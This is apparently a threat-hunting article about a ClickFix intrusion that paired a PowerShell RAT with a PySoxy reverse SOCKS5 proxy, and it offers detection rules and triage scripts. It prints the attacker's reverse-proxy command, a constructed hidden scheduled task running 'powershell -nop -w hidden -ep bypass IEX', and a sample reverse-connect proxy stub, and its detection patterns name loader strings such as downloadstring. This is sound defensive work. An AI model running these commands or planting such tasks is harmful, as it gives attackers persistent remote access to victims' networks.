
Introduction:
Attackers are no longer relying on a single callback channel. In a recent ClickFix intrusion, adversaries deployed a PowerShell RAT with three‑second polling and a redundant PySoxy encrypted SOCKS5 proxy, creating two independent access paths before defenders could react. This highlights a critical gap: blocking a C2 channel is not containment when scheduled tasks keep re‑executing malicious payloads for hours.
Learning Objectives:
- Understand how attackers combine in‑memory PowerShell agents with compiled Python bytecode for redundant C2 channels.
- Learn to detect PySoxy execution patterns using YARA‑L rules and process monitoring.
- Master persistence hunting techniques on Windows, including scheduled task enumeration and forensic artifact analysis.
You Should Know:
1. The Anatomy of a Redundant C2 Chain: PowerShell + PySoxy
The ClickFix campaign established two separate backdoors. First, a scheduled task launched an in-memory PowerShell agent that polled its C2 server every three seconds. Second, the attacker staged compiled Python bytecode (b64.pyc) in `C:\ProgramData` and ran it with:
python.exe b64.pyc -ssl -remote_port 443 -remote_ip <C2_IP>
The arguments name a remote endpoint, so the proxy connects out to the attacker's IP on port 443 rather than listening locally: a reverse SOCKS5 proxy wrapped in SSL/TLS, which blends with ordinary HTTPS egress and relays the attacker's traffic into the network. Shipping a `.pyc` instead of a `.py` sidesteps scanners and content rules that look for readable Python source; the file holds marshalled bytecode, and what application control sees launch is the signed interpreter, not the script.
Detection signal: look for `python.exe` (or `pythonw.exe`) launching with `-ssl`, `-remote_port` and `-remote_ip` together on one command line. Any one of the flags is unremarkable; the three in combination are rare outside this tooling.
Step‑by‑step hunting on Windows:
- Collect PowerShell script block logs (Event ID 4104). The match terms below are starting points to tune: a poller typically contains a sleep loop and a web request, and the staged path is worth matching on directly:
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} |
    Where-Object { $_.Message -match 'ProgramData|Start-Sleep|Invoke-WebRequest|WebClient' } |
    Select-Object TimeCreated, Message
- Enumerate running Python processes with their command lines (Get-CimInstance replaces the deprecated Get-WmiObject; the LIKE filter also catches pythonw.exe):
Get-CimInstance Win32_Process -Filter "Name LIKE 'python%.exe'" |
    Select-Object ProcessId, ParentProcessId, CommandLine
- Use Sysmon Event ID 1 (process creation) to alert on python.exe with all three flags. The Rule element ANDs its conditions; the fragment belongs inside EventFiltering in your Sysmon configuration, and pythonw.exe needs a second Rule block because "end with" python.exe does not match it:
<RuleGroup name="" groupRelation="or">
  <ProcessCreate onmatch="include">
    <Rule name="PySoxy_Execution" groupRelation="and">
      <Image condition="end with">python.exe</Image>
      <CommandLine condition="contains">-ssl</CommandLine>
      <CommandLine condition="contains">-remote_port</CommandLine>
      <CommandLine condition="contains">-remote_ip</CommandLine>
    </Rule>
  </ProcessCreate>
</RuleGroup>
2. Scheduled Task Persistence – The Undying Foothold
The attacker used `schtasks` to create a task that re‑executed the PowerShell agent every few minutes. Even after the C2 channel was blocked, the task kept firing, allowing the actor to reintroduce proxy tooling once the channel reopened.
Verify existing scheduled tasks (Windows). The findstr terms are name guesses; attackers pick innocuous names, so read the full list rather than trusting a keyword hit:
schtasks /query /fo LIST /v | findstr /i "clickfix updater security"
Or use PowerShell to list every enabled task with when it last fired and when it fires next:
Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' } | Get-ScheduledTaskInfo | Select-Object TaskName, TaskPath, LastRunTime, NextRunTime
Manual removal:
schtasks /delete /tn "MaliciousTaskName" /f
Linux equivalent (for cross‑platform awareness): attackers use cron or systemd timers for the same effect. List the current user's crontab (add `-u <user>` for others), the system-wide cron directories, and every timer:
crontab -l
ls -la /etc/cron* /var/spool/cron
systemctl list-timers --all
Mitigation: enable PowerShell script block logging via Group Policy (Computer Configuration -> Administrative Templates -> Windows Components -> Windows PowerShell -> Turn on PowerShell Script Block Logging) and command-line capture for 4688 events (Computer Configuration -> Administrative Templates -> System -> Audit Process Creation -> Include command line in process creation events). Regularly audit scheduled tasks with Autoruns from Sysinternals, which shows each task's action alongside every other autostart location.
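The hunting steps above all come down to reading task definitions for the same few traits: a short repetition interval, a hidden task, an interpreter as the action, and hostile-looking arguments. The script below is an added example, not code from the article or from any vendor tool, that scores Task Scheduler XML on those traits. It reads the format that `schtasks /query /xml` and `Export-ScheduledTask` emit, which is also what sits on disk under `%SystemRoot%\System32\Tasks\` (as UTF-16 XML). The regexes, the 300-second threshold and the "two traits or more" verdict are assumptions to tune; both task definitions are constructed for the example.

```python
"""Triage Task Scheduler XML for re-executing, interpreter-driven persistence."""
import re
import xml.etree.ElementTree as ET
from pathlib import Path

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Assumed lists: interpreters worth a second look, and argument fragments common in loaders.
INTERPRETERS = re.compile(
    r"(powershell|pwsh|python\w*|py|wscript|cscript|mshta|rundll32|regsvr32|cmd)(\.exe)?", re.I)
SUSPICIOUS_ARGS = re.compile(
    r"(-e(c|nc\w*)\s|-w(indowstyle)?\s+hidden|-nop\b|\.pyc\b|programdata|"
    r"-remote_ip|\biex\b|invoke-expression|downloadstring)", re.I)
_DURATION = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")


def iso_duration_seconds(text):
    """ISO 8601 duration as Task Scheduler writes it (PT3M, P1DT2H) -> seconds, else None."""
    m = _DURATION.match((text or "").strip())
    if not m or not any(m.groups()):
        return None
    days, hours, minutes, seconds = (int(g) if g else 0 for g in m.groups())
    return days * 86400 + hours * 3600 + minutes * 60 + seconds


def triage_task(xml_data, max_interval=300):
    """Score one task definition (str, or the UTF-16 bytes of an on-disk task file)."""
    root = ET.fromstring(xml_data)
    reasons = []
    intervals = sorted(
        secs for secs in (iso_duration_seconds(e.text)
                          for e in root.iterfind(".//t:Repetition/t:Interval", NS))
        if secs is not None)
    if intervals and intervals[0] <= max_interval:
        reasons.append(f"repeats every {intervals[0]}s")
    if root.findtext("t:Settings/t:Hidden", default="false", namespaces=NS).strip().lower() == "true":
        reasons.append("hidden task")
    actions = []
    for ex in root.iterfind(".//t:Actions/t:Exec", NS):
        command = (ex.findtext("t:Command", default="", namespaces=NS) or "").strip().strip('"')
        args = ex.findtext("t:Arguments", default="", namespaces=NS) or ""
        actions.append((command, args))
        exe = command.replace("/", "\\").rsplit("\\", 1)[-1]  # basename, env vars and all
        if INTERPRETERS.fullmatch(exe):
            reasons.append(f"runs interpreter {exe.lower()}")
        if SUSPICIOUS_ARGS.search(args):
            reasons.append("suspicious arguments")
    return {
        "author": root.findtext("t:RegistrationInfo/t:Author", default="", namespaces=NS),
        "intervals": intervals,
        "actions": actions,
        "reasons": reasons,
        "suspicious": len(reasons) >= 2,  # one trait alone is common in benign tasks
    }


def triage_folder(folder):
    """Run triage_task over every file in an offline copy of the Tasks folder."""
    results = {}
    for path in Path(folder).rglob("*"):
        if path.is_file():
            try:
                results[str(path)] = triage_task(path.read_bytes())
            except ET.ParseError:
                pass  # not a task definition
    return results


# Constructed task definitions (no XML declaration, so they parse from str).
MALICIOUS_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>WORKSTATION\user</Author></RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT3M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
      <StartBoundary>2024-01-01T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-nop -w hidden -ep bypass -c "IEX (Get-Content C:\ProgramData\stage.ps1 -Raw)"</Arguments>
    </Exec>
  </Actions>
</Task>"""

BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Microsoft Corporation</Author></RegistrationInfo>
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2024-01-01T03:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>%windir%\system32\sc.exe</Command>
      <Arguments>start w32time task_started</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml in (("malicious", MALICIOUS_TASK_XML), ("benign", BENIGN_TASK_XML)):
        print(name, triage_task(xml)["reasons"])
```

Point `triage_folder` at a copy of `C:\Windows\System32\Tasks` pulled from the host (or at a directory of `Export-ScheduledTask` output) and review everything marked suspicious, then everything with a short interval regardless of score: a benign task that happens to run PowerShell gets one reason and stays quiet, which is deliberate, while a hidden task firing an interpreter every few minutes collects several.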
3. Detecting PySoxy with YARA‑L – A Practical Rule Walkthrough
The published YARA‑L rule (link: https://lnkd.in/gzDw8Pnx) keys on Python executing a `.pyc` with the three flags. YARA‑L runs over Chronicle's UDM events, so the published rule cannot be fed to the `yara` binary as-is; the simplified version below is plain YARA for scanning a process memory dump or a staged file in a lab (`yara -r rule.yar <dump-or-pid>`), and its condition requires all three flags rather than any one of them, since a single flag is common:
rule PySoxy_Proxy_Execution
{
    meta:
        description = "PySoxy flag combination (-ssl, -remote_port, -remote_ip) next to a .pyc reference"
        author = "detections.ai"
    strings:
        $cmd1 = "-ssl" ascii wide
        $cmd2 = "-remote_port" ascii wide
        $cmd3 = "-remote_ip" ascii wide
        $pyc = ".pyc" ascii wide
    condition:
        all of ($cmd*) and $pyc
}
How to deploy YARA‑L in a SIEM (e.g., Chronicle, Splunk):
1. Convert the rule to your SIEM’s detection language.
2. In Splunk, search Security 4688 events (command-line auditing must be enabled or Process_Command_Line is empty): index=windows sourcetype=WinEventLog:Security EventCode=4688 New_Process_Name="*\\python.exe" Process_Command_Line="*-ssl*" Process_Command_Line="*-remote_port*" Process_Command_Line="*-remote_ip*"
3. For EDRs like CrowdStrike or Defender for Endpoint, create a custom detection using process creation events.
False positive handling: legitimate PySoxy use by red teams or network engineers. Allowlist known internal destination IPs or add an exception for a specific parent process (e.g., a deployment tool's `setup.exe`), and keep exceptions narrow: once an attacker is on the host the parent process is under their control too.
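The hunting steps in section 1 and the rule walkthrough above express the same logic in three notations (PowerShell filters, a Sysmon rule, a YARA rule). The script below is an added example, not code from the ReliaQuest write-up or the detections.ai rule, that implements that logic once over parsed process-creation events so it can be tested offline: python.exe, pythonw.exe or py.exe launched with `-ssl`, `-remote_port` and `-remote_ip` on one command line, in any order or case, plus the parent-process and internal-IP allowlists discussed under false positives. The `allowed_parents` and `internal_nets` knobs are assumptions for that tuning, and the events are constructed to look like Sysmon Event ID 1 fields.

```python
"""Hunt process-creation events for the PySoxy flag combination."""
import ipaddress
import re
from pathlib import PureWindowsPath

PYTHON_IMAGES = {"python.exe", "pythonw.exe", "py.exe"}
REQUIRED_FLAGS = ("-ssl", "-remote_port", "-remote_ip")
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')  # a quoted argument, or a bare one


def tokenize(cmdline):
    """Split a Windows command line into arguments, honouring double quotes."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]


def analyse_event(event, allowed_parents=frozenset(), internal_nets=()):
    """Return a finding for a PySoxy-style launch, or None.

    event uses Sysmon Event ID 1 field names: Image, CommandLine, ParentImage.
    """
    image = PureWindowsPath(event.get("Image", "")).name.lower()
    if image not in PYTHON_IMAGES:
        return None
    tokens = tokenize(event.get("CommandLine", ""))
    lowered = [t.lower() for t in tokens]
    # One or two of the flags are unremarkable; only the full set is the signal.
    if not all(flag in lowered for flag in REQUIRED_FLAGS):
        return None

    def value_after(flag):
        idx = lowered.index(flag)
        return tokens[idx + 1] if idx + 1 < len(tokens) else None

    try:
        remote_ip = ipaddress.ip_address(value_after("-remote_ip"))
    except ValueError:  # missing or not an address (e.g. flags adjacent)
        remote_ip = None
    try:
        remote_port = int(value_after("-remote_port"))
    except (TypeError, ValueError):
        remote_port = None
    script = next((t for t in tokens if t.lower().endswith((".pyc", ".py"))), None)
    parent = PureWindowsPath(event.get("ParentImage", "")).name.lower()
    suppressed = parent in allowed_parents or (
        remote_ip is not None
        and any(remote_ip in ipaddress.ip_network(n) for n in internal_nets))
    return {
        "image": image,
        "parent": parent,
        "script": script,
        "bytecode": bool(script and script.lower().endswith(".pyc")),
        "staged_in_programdata": bool(script and "\\programdata\\" in script.lower()),
        "remote_ip": str(remote_ip) if remote_ip else value_after("-remote_ip"),
        "remote_port": remote_port,
        "suppressed": suppressed,
    }


def hunt(events, **tuning):
    """Findings that survive the allowlists, in event order."""
    findings = (analyse_event(e, **tuning) for e in events)
    return [f for f in findings if f and not f["suppressed"]]


# Constructed events modelled on Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    {"Image": r"C:\Python39\python.exe",
     "CommandLine": r'python.exe "C:\ProgramData\b64.pyc" -ssl -remote_port 443 -remote_ip 203.0.113.10',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Python39\pythonw.exe",  # flags reordered and upper-cased
     "CommandLine": r"pythonw.exe -REMOTE_IP 10.10.5.5 -remote_port 8443 -SSL C:\Users\dev\proxy.py",
     "ParentImage": r"C:\Tools\setup.exe"},
    {"Image": r"C:\Python39\python.exe",  # ordinary pip run: no flags
     "CommandLine": "python.exe -m pip install --trusted-host pypi.org requests",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Python39\python.exe",  # one flag alone is not the signal
     "CommandLine": r"python.exe C:\Users\dev\proxy.py -ssl",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS, internal_nets=("10.0.0.0/8",)):
        print(hit)
```

Feed it the output of the Get-CimInstance query or a SIEM export of 4688/Sysmon events (mapping `New_Process_Name` and `Process_Command_Line` onto `Image` and `CommandLine`), and treat a hit with `bytecode` and `staged_in_programdata` both true as the exact pattern from this intrusion.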
4. Forensic Artifacts: Where to Find PySoxy and PowerShell Remnants
After containment, collect these artifacts to reconstruct the attack:
File system:
– `C:\ProgramData\*.pyc` (and any `.pyc` outside a Python installation or `__pycache__` directory) – check sizes and creation times against the intrusion window; the `.pyc` header also records the mtime and size of the source it was compiled from.
– `%APPDATA%\Microsoft\Windows\Recent\` – LNK files referencing the staged bytecode or the script that dropped it.
Registry (the cached copy of each task definition, useful when a task has been hidden from `schtasks`):
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks" /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree" /s
The XML definition itself lives under `%SystemRoot%\System32\Tasks\`.
Memory forensics: with a memory dump, run Volatility 3's `windows.cmdline` plugin (`vol -f memory.raw windows.cmdline`) and filter for python.exe with the three flags; `windows.netscan` shows the proxy's socket to the remote IP.
PowerShell transcription logs (if enabled): written to the directory set in the "Turn on PowerShell Transcription" policy (the user's Documents folder when none is configured), not under System32. Look for transcripts whose start times line up with the scheduled task's firings.
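A staged `.pyc` can be triaged without running it. The script below is an added example, not part of the article and not PySoxy code: it decodes the 16-byte header that Python 3.7+ writes (magic number, flags, then either the source mtime and size or a source hash), reports which CPython release produced the file, and, when the magic matches the running interpreter, unmarshals the code object to list its string constants and referenced names. `marshal.loads` deserialises; it does not execute anything, but it is not hardened against hostile input, so do this in a disposable VM. The magic-number table is a partial copy of the values in CPython's importlib/_bootstrap_external.py, the indicator set is an assumption, and the sample source is a constructed stand-in for a reverse-connect proxy's argument parser.

```python
"""Static triage of a staged .pyc: header decode plus string/name extraction."""
import importlib.util
import marshal
import struct
import types
from datetime import datetime, timezone

MAGIC = importlib.util.MAGIC_NUMBER  # this interpreter's own pyc magic
# Low 16 bits of the magic -> CPython release (partial table, from importlib/_bootstrap_external.py).
KNOWN_MAGIC = {3394: "3.7", 3413: "3.8", 3425: "3.9", 3439: "3.10",
               3495: "3.11", 3531: "3.12", 3571: "3.13"}
# Assumed indicators: the flags from the intrusion plus the socket/TLS names a proxy needs.
INDICATORS = {"-ssl", "-remote_port", "-remote_ip", "socket", "ssl", "connect",
              "wrap_socket", "SOCK_STREAM"}


def parse_pyc_header(data):
    """Decode the PEP 552 header (Python 3.7+; earlier releases used 12 bytes)."""
    if len(data) < 16:
        raise ValueError("shorter than a 3.7+ pyc header")
    magic = data[:4]
    flags = struct.unpack("<I", data[4:8])[0]
    header = {
        "magic": magic.hex(),
        "python": KNOWN_MAGIC.get(struct.unpack("<H", magic[:2])[0], "unknown"),
        "same_python": magic == MAGIC,
        "flags": flags,
    }
    if flags & 1:  # hash-based pyc: 8-byte hash of the source
        header["source_hash"] = data[8:16].hex()
        header["check_source"] = bool(flags & 2)
    else:          # timestamp-based pyc: source mtime and size
        mtime, size = struct.unpack("<II", data[8:16])
        header["source_mtime"] = datetime.fromtimestamp(mtime, tz=timezone.utc).isoformat()
        header["source_size"] = size
    return header


def iter_code_objects(code):
    """The module code object and every nested function/class body."""
    yield code
    for const in code.co_consts:
        if isinstance(const, types.CodeType):
            yield from iter_code_objects(const)


def extract_strings(code):
    """String constants and referenced names across all code objects."""
    found = set()
    for co in iter_code_objects(code):
        found.update(c for c in co.co_consts if isinstance(c, str))
        found.update(co.co_names)
    return found


def triage_pyc(data):
    header = parse_pyc_header(data)
    result = {"header": header, "strings": set(), "indicators": []}
    if not header["same_python"]:
        result["note"] = f"compiled by Python {header['python']}; unmarshal with that version"
        return result
    code = marshal.loads(data[16:])  # deserialises the code object; runs nothing
    result["strings"] = extract_strings(code)
    result["indicators"] = sorted(result["strings"] & INDICATORS)
    return result


# Constructed stand-in for a reverse-connect proxy's CLI (never executed here).
SAMPLE_SOURCE = '''
import argparse, socket, ssl

def main():
    p = argparse.ArgumentParser()
    p.add_argument("-ssl", action="store_true")
    p.add_argument("-remote_port", type=int, default=443)
    p.add_argument("-remote_ip", required=True)
    a = p.parse_args()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if a.ssl:
        s = ssl.wrap_socket(s)
    s.connect((a.remote_ip, a.remote_port))
'''


def build_sample_pyc(source, mtime=1_700_000_000):
    """Timestamp-based pyc in this interpreter's format, as py_compile would write it."""
    code = compile(source, "b64.py", "exec")
    return MAGIC + struct.pack("<III", 0, mtime, len(source)) + marshal.dumps(code)


if __name__ == "__main__":
    report = triage_pyc(build_sample_pyc(SAMPLE_SOURCE))
    print(report["header"])
    print("indicators:", report["indicators"])
```

For a real artifact, `triage_pyc(Path(r"C:\ProgramData\b64.pyc").read_bytes())` first reports the header; if `same_python` is false, rerun it under the release named in `python`, because marshal formats differ between versions.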
5. Cloud and API Security Lessons from the Redundant Proxy Approach
Though this attack targeted endpoints, the same principle applies to cloud environments. Attackers increasingly deploy redundant API backdoors (e.g., two separate Lambda functions or API keys) to maintain access.
Hardening checklist:
- A SOCKS proxy on an instance hands the attacker that instance's network position, including the instance metadata service and the role credentials it serves; keep instance roles least-privilege and alert on those credentials being used from outside the instance (GuardDuty's UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration findings).
- Use VPC flow logs to find long-lived or regularly repeating flows from a single instance to a destination on port 443 that no other host talks to. Flow logs carry no payload, so telling a SOCKS-over-TLS tunnel from ordinary HTTPS needs a TLS-inspecting egress proxy or NDR, not the flow log alone.
- GuardDuty's PenTest findings only flag API calls made from known penetration-testing distributions and say nothing about a proxy on an instance. Its network findings (for example Backdoor:EC2/C&CActivity.B) do key on flow and DNS data, so keep GuardDuty on, but pair it with your own flow-log analytics.
Linux commands to find an established outbound connection on 443 owned by a Python process on a cloud VM:
ss -tunap state established '( dport = :443 )' | grep -i python
netstat -tunap | grep -E ':443 +ESTABLISHED' | grep -i python
Follow up with `lsof -nP -i :443` (or `lsof -nP -p <pid>`) to see the owning process and the files it holds open, such as the staged bytecode.
6. Blocked Callback Is Not Containment – Building a True Response Plan
The critical lesson from the ReliaQuest research (https://lnkd.in/g7vQTDmE) is that endpoint controls blocked both C2 channels, yet the scheduled task kept re‑executing. Defenders stopped investigating after the first blocked PowerShell callback, missing the proxy and persistence.
Response playbook addition:
- Upon blocking an outbound IP, immediately enumerate scheduled tasks and startup items on the affected host.
- Capture a full memory dump before rebooting – the PySoxy proxy may be running only in memory.
- Hunt for alternate processes (Python, Perl, Node.js) that could be tunnelling traffic.
- Use network logs to look for beaconing patterns to other IPs on port 443, even if the primary C2 was blocked.
Automated command to list all non‑Microsoft scheduled tasks on a remote host (PowerShell). The TaskPath test needs the leading backslash and a trailing wildcard; `-notlike "Microsoft"` compares for equality and excludes nothing. Do not treat the `\Microsoft\` exclusion as trusted, since nothing stops an attacker registering a task there:
Invoke-Command -ComputerName target_host -ScriptBlock { Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft\*' } | Select-Object TaskName, TaskPath, State }
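The playbook's last item, and the VPC flow-log point in section 5, both ask for the same analysis: which destinations on 443 does one host keep returning to after its primary C2 was blocked? The script below is an added example, not part of the article, that reads the default AWS VPC flow-log record format (version account-id interface-id srcaddr dstaddr srcport dstport protocol packets bytes start end action log-status) and, per internal-source/external-destination pair, flags three traits: a destination no other internal host talks to, traffic that persists across many capture windows, and record start times at regular intervals. The internal ranges, thresholds and "two traits or more" verdict are assumptions; the records are constructed.

```python
"""Find long-lived or regularly repeating egress to rare destinations in VPC flow logs."""
import ipaddress
import statistics
from collections import defaultdict

FIELDS = ("version", "account", "interface", "src", "dst", "srcport", "dstport",
          "protocol", "packets", "bytes", "start", "end", "action", "status")
# Assumed address space of the VPCs under review (the RFC 1918 ranges).
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL)


def parse_flow(line):
    """One default-format record -> dict, or None for NODATA/SKIPDATA/garbage."""
    parts = line.split()
    if len(parts) != len(FIELDS) or parts[0] != "2":
        return None
    rec = dict(zip(FIELDS, parts))
    if rec["status"] != "OK":  # NODATA/SKIPDATA records carry '-' in the numeric fields
        return None
    for key in ("srcport", "dstport", "protocol", "packets", "bytes", "start", "end"):
        rec[key] = int(rec[key])
    return rec


def profile_egress(lines, dst_port=443, min_span=1800, max_cv=0.25):
    """Score each (internal src, external dst) pair on dst_port; return the suspicious ones."""
    flows = [r for r in map(parse_flow, lines) if r]
    pairs = defaultdict(list)
    sources_per_dst = defaultdict(set)
    for r in flows:
        if r["action"] != "ACCEPT" or r["protocol"] != 6 or r["dstport"] != dst_port:
            continue
        if not is_internal(r["src"]) or is_internal(r["dst"]):
            continue
        pairs[(r["src"], r["dst"])].append(r)
        sources_per_dst[r["dst"]].add(r["src"])
    findings = []
    for (src, dst), recs in pairs.items():
        recs.sort(key=lambda r: r["start"])
        span = recs[-1]["end"] - recs[0]["start"]
        deltas = [b["start"] - a["start"] for a, b in zip(recs, recs[1:])]
        mean = statistics.mean(deltas) if deltas else 0
        # Coefficient of variation of the gaps: near zero means clockwork reconnects.
        cv = statistics.pstdev(deltas) / mean if len(deltas) >= 3 and mean > 0 else None
        reasons = []
        if len(sources_per_dst[dst]) == 1:
            reasons.append("only one internal host talks to this destination")
        if span >= min_span:
            reasons.append(f"traffic spans {span}s")
        if cv is not None and cv <= max_cv:
            reasons.append(f"records start every ~{round(mean)}s (cv={cv:.2f})")
        if len(reasons) >= 2:
            findings.append({"src": src, "dst": dst, "records": len(recs),
                             "distinct_srcports": len({r["srcport"] for r in recs}),
                             "span": span, "reasons": reasons})
    return findings


def _rec(src, dst, sport, start, end, dport=443, action="ACCEPT"):
    """Build one constructed default-format record."""
    return f"2 123456789012 eni-0a1b2c3d4e5f6a7b8 {src} {dst} {sport} {dport} 6 40 6000 {start} {end} {action} OK"


SAMPLE_FLOW_LINES = [  # constructed
    # 10.0.1.20 reconnects to 203.0.113.10:443 every 300 s for about 35 minutes
    *[_rec("10.0.1.20", "203.0.113.10", 49000 + i, 1700000000 + 300 * i, 1700000000 + 300 * i + 280)
      for i in range(7)],
    # CDN-style destination reached by several hosts at irregular times
    _rec("10.0.1.20", "198.51.100.7", 50001, 1700000120, 1700000130),
    _rec("10.0.1.20", "198.51.100.7", 50002, 1700000950, 1700000960),
    _rec("10.0.1.21", "198.51.100.7", 50003, 1700000400, 1700000410),
    _rec("10.0.1.22", "198.51.100.7", 50004, 1700001300, 1700001310),
    # a rejected attempt and an aggregation window that captured nothing
    _rec("10.0.1.23", "203.0.113.10", 50005, 1700000500, 1700000500, action="REJECT"),
    "2 123456789012 eni-0a1b2c3d4e5f6a7b8 - - - - - - - 1700000000 1700000600 - NODATA",
]

if __name__ == "__main__":
    for finding in profile_egress(SAMPLE_FLOW_LINES):
        print(finding)
```

Flow logs aggregate per capture window (up to 10 minutes by default, 1 minute if you opt in), so a 3-second poller shows up as many short records with distinct source ports rather than one connection; the 1-minute setting makes the interval estimate much sharper. Run the profile for the hours after the primary C2 block, and any pair that surfaces with a fresh destination is the backup channel the playbook tells you to look for.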
What Undercode Say:
- Key Takeaway 1: Attackers are weaponizing simple, old tools (PySoxy is 10+ years old) in new ways – `.pyc` execution and redundant proxies. Signature‑based tools miss these unless you monitor command‑line arguments.
- Key Takeaway 2: Persistence outlives blocking. A scheduled task that keeps relaunching an agent which polls every three seconds gives an attacker unlimited retries. Your incident response must include persistence hunting even after the C2 channel appears dead.
Analysis: The ClickFix campaign demonstrates a shift toward operational redundancy. Rather than deploying one sophisticated backdoor, adversaries build multiple simple, noisy, but independent access paths. Defenders need to combine process creation monitoring, scheduled task audits, and network anomaly detection. Compiled Python bytecode slips past application control policies that allowlist the Python interpreter: the signed python.exe is what launches, and the policy never evaluates the `.pyc`. Training courses on "Living off the Land" (LotL) techniques must now include Python bytecode execution as a first‑class vector. Organizations should implement "blocked callback" playbooks that trigger full host investigations, not just IP reconfiguration. The YARA‑L rule provided by detections.ai is a solid start, but false positives will occur; tune rather than abandon it. Finally, this attack highlights why endpoint detection and response (EDR) products need to parse command lines for logical flag combinations, not just static strings.
Prediction:
Within the next 12 months, we will see a surge in attacks using multiple redundant C2 protocols (e.g., WebSocket + DNS tunnel + SOCKS5) deployed via scheduled tasks on Windows and cron on Linux. As AI‑based detection improves on single‑channel anomalies, attackers will shift to “channel hopping” and proxy chaining. Cloud workloads will become prime targets because they often lack scheduled task visibility. Expect vendors to release “persistence score” metrics, and incident response retainer agreements will add specific financial penalties for missed scheduled tasks. The ClickFix playbook will be adopted by ransomware groups to ensure backup proxies stay alive while the main C2 is being mitigated, leading to double‑extortion even after initial shutdown.
Related Video:
https://www.youtube.com/watch?v=3l5btGWh4pM
Reported By: Tcp Sec – Hackers Feeds